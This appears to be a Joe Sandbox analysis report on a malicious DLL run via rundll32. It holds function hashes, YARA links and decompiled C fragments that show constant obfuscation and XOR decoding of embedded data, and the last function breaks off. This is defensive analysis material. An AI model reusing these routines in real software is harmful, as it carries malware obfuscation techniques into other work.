Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +,"$oZ
API String ID: 0-2218578008
Opcode ID: 36948431c4fa179cd8bab93fa242a1fc78fd0d12126f49712600092e518b7711
Instruction ID: fa14b426ce5e04f8a063e1040d56c0ac4323f6474657a8a9b82eb9260ed81a99
Opcode Fuzzy Hash: 36948431c4fa179cd8bab93fa242a1fc78fd0d12126f49712600092e518b7711
Instruction Fuzzy Hash: 78314471D00609EBDB08CFA5C98A99EFBB0FB44314F208599D416B7250D3B46B85DF80

Uniqueness

Uniqueness Score: -1.00%

Function 0017F793, Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

+,", xrefs: 0017F7AA
oZ, xrefs: 0017F7E4

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +,"$oZ
API String ID: 0-2218578008
Opcode ID: bf2bae43fa27af6f261db997c93353eed6f3a7671df8ad2c815519cc70e3ba68
Instruction ID: e3f36296710e6991e77bc19f355a59733d079c5ade74b3f081d8f70c964f89b0
Opcode Fuzzy Hash: bf2bae43fa27af6f261db997c93353eed6f3a7671df8ad2c815519cc70e3ba68
Instruction Fuzzy Hash: 1E211371D04609EBDB08CFA5D98A5DEFBB0FB40318F208199C015B7250D3B85B49CF84

Uniqueness

Uniqueness Score: -1.00%

Function 0046303C, Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

d.G, xrefs: 004631FF, 00463316

Memory Dump Source

Source File: 00000007.00000002.2331029557.0000000000453000.00000020.00020000.sdmp, Offset: 00453000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_453000_rundll32.jbxd

Similarity

API ID:
String ID: d.G
API String ID: 0-1394632689
Opcode ID: 87fd5f2e8eca8969ac08bc44e0bbbc8792eafbc889f2103f056ec3b1e028a918
Instruction ID: 0c9b631625becc2ef7bca4b756f1b24907f535cfd6cd8a1768afd86fdfa60a2d
Opcode Fuzzy Hash: 87fd5f2e8eca8969ac08bc44e0bbbc8792eafbc889f2103f056ec3b1e028a918
Instruction Fuzzy Hash: 9DB1B670B00184EFCB15DF69C995AAEB3F5EB09305F5584AAF804A7351EB38AF44CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00444A9E, Relevance: 1.4, Strings: 1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00444A9E(void* __edx, void* __eflags, signed int* _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* __ecx;
				void* _t100;
				intOrPtr _t114;
				signed int _t117;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t142;
				intOrPtr _t143;
				intOrPtr _t147;

				_push(_a16);
				_push(0x450000);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00442550(_t100);
				_v40 = _v40 & 0x00000000;
				_v44 = 0x156874;
				_v20 = 0x9c2a;
				_v20 = _v20 << 5;
				_t123 = 0x35;
				_v20 = _v20 / _t123;
				_v20 = _v20 ^ 0x00002bb4;
				_v36 = 0xf1e6;
				_v36 = _v36 + 0xffff56d9;
				_v36 = _v36 ^ 0x00000861;
				_v8 = 0x90c5;
				_t124 = 0x75;
				_v8 = _v8 * 0xa;
				_v8 = _v8 ^ 0x847d0871;
				_v8 = _v8 + 0xb0b6;
				_v8 = _v8 ^ 0x847969bf;
				_v32 = 0xdffe;
				_t125 = 0x5f;
				_v32 = _v32 / _t124;
				_v32 = _v32 ^ 0x21a7c3f7;
				_v32 = _v32 ^ 0x21a7f23e;
				_v28 = 0x83e8;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 ^ 0xeff97ecd;
				_v28 = _v28 ^ 0xeff95885;
				_v16 = 0x2648;
				_v16 = _v16 * 0x3e;
				_t126 = 9;
				_v16 = _v16 / _t125;
				_v16 = _v16 ^ 0x58b3f5ba;
				_v16 = _v16 ^ 0x58b39d5c;
				_v12 = 0x62ef;
				_v12 = _v12 | 0xb941bdbf;
				_v12 = _v12 << 7;
				_v12 = _v12 | 0x29e74872;
				_v12 = _v12 ^ 0xa9ffcd1d;
				_v24 = 0x928c;
				_v24 = _v24 / _t126;
				_v24 = _v24 + 0xb150;
				_v24 = _v24 ^ 0x0000c198;
				_t142 = 0x34;
				_t114 = E004354FB(_t142);
				 *0x45108c = _t114;
				if(_t114 == 0) {
					L7:
					return 0;
				}
				 *((intOrPtr*)(_t114 + 0x20)) = 0x450000;
				 *((intOrPtr*)(_t114 + 0x24)) = 0x450000;
				_t143 =  *0x45108c;
				_t147 =  *((intOrPtr*)(_t143 + 0x20));
				 *(_t143 + 4) = _v24;
				_t117 =  *(_t143 + 0x14);
				while( *((intOrPtr*)(_t147 + _t117 * 8)) != 0) {
					_t117 = _t117 + 1;
					 *(_t143 + 0x14) = _t117;
				}
				if(E004367EF(_a4, _v8, _v32, _v28) == 0) {
					E0043DE81(_v16,  *0x45108c, _v12);
					goto L7;
				}
				return 1;
			}

0x00444aa5
0x00444aad
0x00444aae
0x00444ab1
0x00444ab4
0x00444ab6
0x00444abb
0x00444ac1
0x00444ac8
0x00444acf
0x00444ad8
0x00444add
0x00444ae2
0x00444ae9
0x00444af0
0x00444af7
0x00444afe
0x00444b09
0x00444b0c
0x00444b0f
0x00444b16
0x00444b1d
0x00444b24
0x00444b30
0x00444b31
0x00444b36
0x00444b3d
0x00444b44
0x00444b4b
0x00444b4f
0x00444b56
0x00444b5d
0x00444b6a
0x00444b72
0x00444b73
0x00444b78
0x00444b82
0x00444b89
0x00444b90
0x00444b97
0x00444b9b
0x00444ba2
0x00444ba9
0x00444bb7
0x00444bba
0x00444bc1
0x00444bce
0x00444bcf
0x00444bd4
0x00444bdc
0x00444c30
0x00000000
0x00444c30
0x00444bde
0x00444be1
0x00444be7
0x00444bed
0x00444bf0
0x00444bf3
0x00444bfc
0x00444bf8
0x00444bf9
0x00444bf9
0x00444c17
0x00444c2a
0x00000000
0x00444c2f
0x00000000

Strings

rH), xrefs: 00444B9B

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: rH)
API String ID: 0-3429678651
Opcode ID: 7b40190b8cea73f9309c9e2c6a22938dacbe733b2ad8669f89be35bcfbe02ae1
Instruction ID: 9445b9fa0b4e9cf097cccdcfb4ff5034159c447d9bdc41e7fd5f9d939cddda10
Opcode Fuzzy Hash: 7b40190b8cea73f9309c9e2c6a22938dacbe733b2ad8669f89be35bcfbe02ae1
Instruction Fuzzy Hash: 41515A75D0020AEFEF08CFA5D9466EEBBB1FF44310F20815AD415AB290DBB89A41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00184012, Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

rH), xrefs: 0018410F

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: rH)
API String ID: 0-3429678651
Opcode ID: a9c3be9c37764caaac0b5c82abcb2aefc8fd1c7a0dc47e201cdc7581efa4c114
Instruction ID: 31a06e4d80a545ace2cf2477ea59b50ccb55397d61f5c402a5463b6c0ba99baf
Opcode Fuzzy Hash: a9c3be9c37764caaac0b5c82abcb2aefc8fd1c7a0dc47e201cdc7581efa4c114
Instruction Fuzzy Hash: 6B512875D0121AEFEB08DFA4C94A5EEBBB1FF54310F208159E415AB290DBB99B41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 004447B5, Relevance: 1.4, Strings: 1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E004447B5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v592;
				void* _t127;
				void* _t133;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t127);
				_v68 = _v68 & 0x00000000;
				_v64 = _v64 & 0x00000000;
				_v72 = 0x50be0a;
				_v24 = 0xa904;
				_v24 = _v24 + 0xe5cc;
				_v24 = _v24 ^ 0x597c5b93;
				_push(0x43142c);
				_v24 = _v24 * 0x54;
				_v24 = _v24 ^ 0x5d49852f;
				_v32 = 0x6077;
				_v32 = _v32 + 0xffffd427;
				_v32 = _v32 + 0x605a;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x253e0470;
				_v16 = 0x766e;
				_v16 = _v16 ^ 0x0e68fc54;
				_v16 = _v16 + 0x5b78;
				_v16 = _v16 + 0xffff6155;
				_v16 = _v16 ^ 0x0e6822fb;
				_v36 = 0x46d0;
				_v36 = _v36 | 0xbf6b54fd;
				_v36 = _v36 >> 4;
				_v36 = _v36 + 0xffffefba;
				_v36 = _v36 ^ 0x0bf6ca05;
				_v60 = 0xe881;
				_v60 = _v60 + 0xb91a;
				_v60 = _v60 ^ 0x0001fd39;
				_v48 = 0xb097;
				_v48 = _v48 ^ 0xf0f26416;
				_v48 = _v48 ^ 0xf0f2a086;
				_v12 = 0xfe0b;
				_v12 = _v12 * 0x6d;
				_v12 = _v12 + 0xe3c7;
				_v12 = _v12 + 0xffff63fe;
				_v12 = _v12 ^ 0x006c422a;
				_v40 = 0xb7e6;
				_v40 = _v40 ^ 0x86f830c6;
				_v40 = _v40 ^ 0x86f8ac5d;
				_v28 = 0xaa43;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0xaa541b7f;
				_v28 = _v28 + 0xffff7b49;
				_v28 = _v28 ^ 0xaa53dcd3;
				_v56 = 0xcf43;
				_v56 = _v56 * 0x49;
				_v56 = _v56 ^ 0x003b1f16;
				_v20 = 0xfc45;
				_v20 = _v20 + 0xffba;
				_v20 = _v20 + 0xaf52;
				_v20 = _v20 >> 0xc;
				_v20 = _v20 ^ 0x00007f51;
				_v52 = 0x343e;
				_v52 = _v52 + 0xffff8ecd;
				_v52 = _v52 ^ 0xffffad90;
				_v44 = 0x9594;
				_v44 = _v44 * 0x28;
				_v44 = _v44 ^ 0x001772e3;
				_v8 = 0x6cd9;
				_v8 = _v8 + 0xffff1db8;
				_v8 = _v8 + 0xffffd279;
				_v8 = _v8 ^ 0xb0257305;
				_v8 = _v8 ^ 0x4fda3672;
				_push(_v36);
				_push(_v16);
				_t133 = E00435DFC(_v24, _v32, _v8);
				E0043ECBD(_v60, _v8, _v24, _v48, _v12,  &_v592, _v40, __edx);
				E00440D6D(_v28, _v56, _v20, _t133);
				return E0043EB1E(_v52, _v44, _v8,  &_v592);
			}

0x004447c0
0x004447c5
0x004447c8
0x004447cb
0x004447cc
0x004447cd
0x004447d2
0x004447d6
0x004447da
0x004447e1
0x004447e8
0x004447ef
0x004447fa
0x004447ff
0x00444802
0x00444809
0x00444810
0x00444817
0x0044481e
0x00444822
0x00444829
0x00444830
0x00444837
0x0044483e
0x00444845
0x0044484c
0x00444853
0x0044485a
0x0044485e
0x00444865
0x0044486c
0x00444873
0x0044487a
0x00444881
0x00444888
0x0044488f
0x00444896
0x004448a1
0x004448a4
0x004448ab
0x004448b2
0x004448b9
0x004448c0
0x004448c7
0x004448ce
0x004448d5
0x004448d9
0x004448e0
0x004448e7
0x004448ee
0x004448f9
0x004448fc
0x00444903
0x0044490a
0x00444911
0x00444918
0x0044491c
0x00444923
0x0044492a
0x00444931
0x00444938
0x00444943
0x00444946
0x0044494d
0x00444954
0x0044495b
0x00444962
0x00444969
0x00444970
0x00444973
0x0044497c
0x0044499d
0x004449ac
0x004449ce

Strings

*Bl, xrefs: 004448B2

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *Bl
API String ID: 0-1288706768
Opcode ID: 684c2b0814f6eacfa7e006c7edb06e1b8c5234dae77a7f0a42b1dcc32fc0ae90
Instruction ID: 07aa8a835f8676848e4177d8926fdfacf0bee6c1c54041610d923f8cd400fcbe
Opcode Fuzzy Hash: 684c2b0814f6eacfa7e006c7edb06e1b8c5234dae77a7f0a42b1dcc32fc0ae90
Instruction Fuzzy Hash: 4D51E0B1C0130EABDF54CFE5D98A4EEBBB1FB48318F208158E515762A0D3B95A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00442631, Relevance: 1.3, Strings: 1, Instructions: 91
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00442631(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* _t92;
				signed int _t109;
				signed int _t110;
				void* _t119;
				signed int _t120;
				void* _t123;

				_t123 = __eflags;
				_push(_a8);
				_t119 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t92);
				_v44 = _v44 & 0x00000000;
				_v56 = 0x428c97;
				_v52 = 0x699918;
				_v48 = 0x4b9b3f;
				_v16 = 0x691;
				_t109 = 0x25;
				_v16 = _v16 * 0x4b;
				_v16 = _v16 * 0x44;
				_v16 = _v16 ^ 0x0082d99d;
				_v24 = 0xda4d;
				_v24 = _v24 >> 2;
				_v24 = _v24 + 0xa7aa;
				_v24 = _v24 ^ 0x00009b39;
				_v20 = 0x8ab8;
				_v20 = _v20 + 0xbc5;
				_v20 = _v20 + 0x8be6;
				_v20 = _v20 ^ 0x00013aa9;
				_v12 = 0x3e92;
				_v12 = _v12 * 0x48;
				_v12 = _v12 + 0xffff6b24;
				_v12 = _v12 | 0xd8f0c2a4;
				_v12 = _v12 ^ 0xd8f1a727;
				_v36 = 0x20a;
				_v36 = _v36 ^ 0x637f1cbb;
				_v36 = _v36 ^ 0x637f1131;
				_v8 = 0x38cb;
				_v8 = _v8 ^ 0x7b367a31;
				_v8 = _v8 << 1;
				_v8 = _v8 / _t109;
				_v8 = _v8 ^ 0x06a897b6;
				_v28 = 0xa730;
				_v28 = _v28 << 5;
				_v28 = _v28 + 0x5f1e;
				_v28 = _v28 ^ 0x00154d8c;
				_v40 = E0043A156();
				_v32 = 0xde76;
				_v32 = _v32 + 0x8a52;
				_v32 = _v32 ^ 0x000168cc;
				_v16 = 0x1d5e;
				_t110 = 7;
				_v16 = _v16 / _t110;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x00000053;
				_t120 = E0043DF8A(_t110, _v16 % _t110, _t123, _v16, _v32);
				E00449A27( &_v40, 1, _v12, _t120, _t119, _v36, _v8, _v28);
				 *((short*)(_t119 + _t120 * 2)) = 0;
				return 0;
			}

0x00442631
0x00442639
0x0044263c
0x0044263e
0x00442641
0x00442642
0x00442643
0x00442648
0x0044264e
0x00442655
0x0044265c
0x00442663
0x00442670
0x00442671
0x00442678
0x0044267b
0x00442682
0x00442689
0x0044268d
0x00442694
0x0044269b
0x004426a2
0x004426a9
0x004426b0
0x004426b7
0x004426c2
0x004426c5
0x004426cc
0x004426d3
0x004426da
0x004426e1
0x004426e8
0x004426ef
0x004426f6
0x004426fd
0x00442705
0x00442708
0x0044270f
0x00442716
0x0044271a
0x00442721
0x00442730
0x00442735
0x0044273c
0x00442743
0x0044274a
0x00442756
0x00442759
0x0044275c
0x00442760
0x00442778
0x0044278b
0x00442795
0x0044279e

Strings

1z6{, xrefs: 004426F6

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1z6{
API String ID: 0-2122224799
Opcode ID: ba165720bb9331fcc9edb768f8659e2843ce2937904f7b6f9b2030632d0d4806
Instruction ID: de6d60ab2adad2ae273033ec29321031664abefba5b695cee925d7eb39b8e436
Opcode Fuzzy Hash: ba165720bb9331fcc9edb768f8659e2843ce2937904f7b6f9b2030632d0d4806
Instruction Fuzzy Hash: C241FFB1D00209EBEF04CFE6C94A5EEBBB1BB84308F10819AE425B6250D7B90B55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00181BA5, Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

1z6{, xrefs: 00181C6A

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1z6{
API String ID: 0-2122224799
Opcode ID: 9fa61a0daab0e8ff7785b0de2f7bf674fdbe98d46cc6ca9acc9c4015203d1668
Instruction ID: c2df76f2195cdc2b6622ecef0ef8995771435174deaec2c3b9856020832fa3e5
Opcode Fuzzy Hash: 9fa61a0daab0e8ff7785b0de2f7bf674fdbe98d46cc6ca9acc9c4015203d1668
Instruction Fuzzy Hash: D541FFB1D00209EBEF04DFE5C94A5EEBBB5BB84308F108199E515B6290D7B80B45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0044A966, Relevance: 1.3, Strings: 1, Instructions: 88
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E0044A966(void* __ecx, void* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, signed int* _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t38;
				signed int _t42;
				signed int _t48;
				signed int* _t51;
				signed int _t53;
				void* _t60;
				signed int _t64;
				signed int _t65;
				void* _t71;
				intOrPtr _t72;
				signed int* _t74;
				unsigned int _t77;
				signed int _t80;

				_t51 = _a16;
				_push(_t51);
				_push(_a12);
				_push(_a8);
				_push(0x4310ec);
				_push(__edx);
				_t38 = E00442550(0x4310ec);
				_push(_t51);
				_push(_t38);
				E00442550(_t38);
				_v12 = 0x4b1aac;
				_t72 = 0;
				_v8 = 0x6e8720;
				_v4 = 0;
				_v28 = 0x88f3;
				_v28 = _v28 >> 2;
				_v28 = _v28 ^ 0x975e54be;
				_v28 = _v28 + 0xe7d8;
				_v28 = _v28 ^ 0x975f6258;
				_v24 = 0xe148;
				_t53 = 0x36;
				_v24 = _v24 / _t53;
				_v24 = _v24 ^ 0x00006f46;
				_t42 =  *0x4310ec; // 0x7d7b62b8
				_t64 =  *0x4310f0; // 0x7d7b62d2
				_t65 = _t64 ^ _t42;
				_v20 = _t42;
				_v16 = _t65;
				_t77 =  !=  ? (_t65 & 0xfffffffc) + 4 : _t65;
				_t48 = E004354FB(_t77);
				_v24 = _t48;
				if(_t48 != 0) {
					_t74 = 0x4310f4;
					_t71 =  <  ? 0 :  &(0x4310f4[_t77 >> 2]) - 0x4310f4 + 3 >> 2;
					if(_t71 != 0) {
						_t80 = _v20;
						_t60 = _t48 - 0x4310f4;
						do {
							_t72 = _t72 + 1;
							 *(_t60 + _t74) =  *_t74 ^ _t80;
							_t34 =  &(_t74[1]); // 0x21a8adb8
							_t74 = _t34;
						} while (_t72 < _t71);
						_t48 = _v24;
					}
					if(_t51 != 0) {
						 *_t51 = _v16;
						return _t48;
					}
				}
				return _t48;
			}

0x0044a96a
0x0044a975
0x0044a976
0x0044a97a
0x0044a97e
0x0044a97f
0x0044a981
0x0044a986
0x0044a987
0x0044a988
0x0044a98d
0x0044a995
0x0044a997
0x0044a9a1
0x0044a9a5
0x0044a9ad
0x0044a9b2
0x0044a9ba
0x0044a9c2
0x0044a9ca
0x0044a9d8
0x0044a9db
0x0044a9df
0x0044a9e7
0x0044a9ec
0x0044a9f2
0x0044a9f4
0x0044a9fa
0x0044aa0b
0x0044aa1b
0x0044aa20
0x0044aa27
0x0044aa2d
0x0044aa47
0x0044aa4c
0x0044aa4e
0x0044aa54
0x0044aa56
0x0044aa5a
0x0044aa5b
0x0044aa5e
0x0044aa5e
0x0044aa61
0x0044aa65
0x0044aa65
0x0044aa6c
0x0044aa72
0x00000000
0x0044aa72
0x0044aa6c
0x0044aa7a

Strings

Fo, xrefs: 0044A9DF

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Fo
API String ID: 0-989300405
Opcode ID: d4d21a8cd2903082307b8adb5b6b6f80f6eb2ffad494f5cbfb4c565e5b84740f
Instruction ID: df08a6d542f79b8a2dd270958f0d60106aac97737c36b670f3ce22561b2ba12a
Opcode Fuzzy Hash: d4d21a8cd2903082307b8adb5b6b6f80f6eb2ffad494f5cbfb4c565e5b84740f
Instruction Fuzzy Hash: A231E2716083409FE758DF69C98191BBBE6EFC8304F80992EF48593320DB79D8068B16

Uniqueness

Uniqueness Score: -1.00%

Function 00189EDA, Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

Fo, xrefs: 00189F53

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Fo
API String ID: 0-989300405
Opcode ID: aac4d8590ea3ad44cebb468c9db13773b583fba6e11cb25d81e01db20ea26708
Instruction ID: 792427a1a4bdbc5be7510e79a49d3b14699c50957bde9849b1f8e1296a0b43a9
Opcode Fuzzy Hash: aac4d8590ea3ad44cebb468c9db13773b583fba6e11cb25d81e01db20ea26708
Instruction Fuzzy Hash: D731D171608380AFE758EF29C88185FBBEAEBC8304F84892DF585C3254DB75D9068F12

Uniqueness

Uniqueness Score: -1.00%

Function 0044CF31, Relevance: 1.3, Strings: 1, Instructions: 87
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E0044CF31(void* __ecx, void* __edx, void* __eflags) {
				void* _t35;
				signed int _t39;
				unsigned int* _t51;
				signed int _t52;
				signed int _t54;
				signed int _t59;
				unsigned int _t60;
				unsigned int _t61;
				unsigned int* _t65;
				signed int* _t67;
				signed int* _t68;
				signed int* _t69;
				unsigned int _t71;
				void* _t77;
				void* _t79;
				void* _t81;
				void* _t82;

				_t69 =  *(_t81 + 0x2c);
				_push(_t69);
				_push( *((intOrPtr*)(_t81 + 0x30)));
				_push(__edx);
				E00442550(_t35);
				 *((intOrPtr*)(_t81 + 0x28)) = 0x2f20f4;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				 *(_t81 + 0x1c) = 0xdb93;
				_t67 =  &(_t69[1]);
				 *(_t81 + 0x1c) =  *(_t81 + 0x1c) ^ 0xcf590e5f;
				 *(_t81 + 0x1c) =  *(_t81 + 0x1c) ^ 0xcf59d9ad;
				 *(_t81 + 0x40) = 0x4aee;
				 *(_t81 + 0x40) =  *(_t81 + 0x40) >> 0xd;
				 *(_t81 + 0x40) =  *(_t81 + 0x40) >> 0xb;
				 *(_t81 + 0x40) =  *(_t81 + 0x40) ^ 0x00002cea;
				_t54 =  *_t69;
				_t68 =  &(_t67[1]);
				_t39 =  *_t67 ^ _t54;
				 *(_t81 + 0x20) = _t54;
				 *(_t81 + 0x24) = _t39;
				_t20 = _t39 + 1; // 0x1
				_t71 =  !=  ? (_t20 & 0xfffffffc) + 4 : _t20;
				_t82 = _t81 + 0xc;
				_t51 = E004354FB(_t71);
				 *(_t82 + 0x34) = _t51;
				if(_t51 != 0) {
					_t79 = 0;
					_t65 = _t51;
					_t77 =  >  ? 0 :  &(_t68[_t71 >> 2]) - _t68 + 3 >> 2;
					if(_t77 != 0) {
						_t52 =  *(_t82 + 0x14);
						do {
							_t59 =  *_t68;
							_t68 =  &(_t68[1]);
							_t60 = _t59 ^ _t52;
							 *_t65 = _t60;
							_t65 =  &(_t65[1]);
							_t61 = _t60 >> 0x10;
							 *((char*)(_t65 - 3)) = _t60 >> 8;
							 *(_t65 - 2) = _t61;
							_t79 = _t79 + 1;
							 *((char*)(_t65 - 1)) = _t61 >> 8;
						} while (_t79 < _t77);
						_t51 =  *(_t82 + 0x34);
					}
					 *((char*)(_t51 +  *((intOrPtr*)(_t82 + 0x18)))) = 0;
				}
				return _t51;
			}

0x0044cf36
0x0044cf3b
0x0044cf3c
0x0044cf40
0x0044cf42
0x0044cf49
0x0044cf55
0x0044cf56
0x0044cf57
0x0044cf58
0x0044cf60
0x0044cf63
0x0044cf6b
0x0044cf73
0x0044cf7b
0x0044cf80
0x0044cf85
0x0044cf8d
0x0044cf91
0x0044cf94
0x0044cf96
0x0044cf9a
0x0044cf9e
0x0044cfae
0x0044cfb9
0x0044cfc3
0x0044cfc5
0x0044cfcc
0x0044cfd4
0x0044cfd6
0x0044cfe7
0x0044cfec
0x0044cfee
0x0044cff2
0x0044cff2
0x0044cff4
0x0044cff7
0x0044cff9
0x0044d000
0x0044d003
0x0044d006
0x0044d009
0x0044d00f
0x0044d010
0x0044d013
0x0044d017
0x0044d017
0x0044d020
0x0044d020
0x0044d02c

Strings

,, xrefs: 0044CF85

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-48859977
Opcode ID: 5ce2485613cba5a6437e7217406bc29238c0f0aad0300714a2d7ecf3c9a30912
Instruction ID: d99fe683e93040213da91c2b8fc9d90379729ac79e4632da4026cbcc0c4884ce
Opcode Fuzzy Hash: 5ce2485613cba5a6437e7217406bc29238c0f0aad0300714a2d7ecf3c9a30912
Instruction Fuzzy Hash: 2431B832A097518FD314CE2CC88155BFBE0EF99704F054A2EEA89A7301C774E90ACB96

Uniqueness

Uniqueness Score: -1.00%

Function 0018C4A5, Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

,, xrefs: 0018C4F9

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-48859977
Opcode ID: b7babf8be26eab1100141104debef1777e84d1ab42b81237bf176bb25377396b
Instruction ID: ca84b64de0763e517772c8c9bde3375cf2f9922c9a25c5866cf02e39715cdfcf
Opcode Fuzzy Hash: b7babf8be26eab1100141104debef1777e84d1ab42b81237bf176bb25377396b
Instruction Fuzzy Hash: 7B319832A093519FD714DE28C88155BFBE0EF99704F054A6DEA8997301C770EA0ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0017498C, Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

YQ, xrefs: 001749EA

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: YQ
API String ID: 0-919377280
Opcode ID: 832c9db957fb198b4f060a0ba3ba27daba2b91c64806fc125af17a29fa887a50
Instruction ID: 749accd547190d8c0b6968408cac6300eca0cb2637840ebcbe74ccf3e500e183
Opcode Fuzzy Hash: 832c9db957fb198b4f060a0ba3ba27daba2b91c64806fc125af17a29fa887a50
Instruction Fuzzy Hash: 2F212472D0020DEBDB05DFE5D80A9DFBBB2EB84704F108099E914A7250C7B65A24DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00440223, Relevance: 1.3, Strings: 1, Instructions: 68
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00440223(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
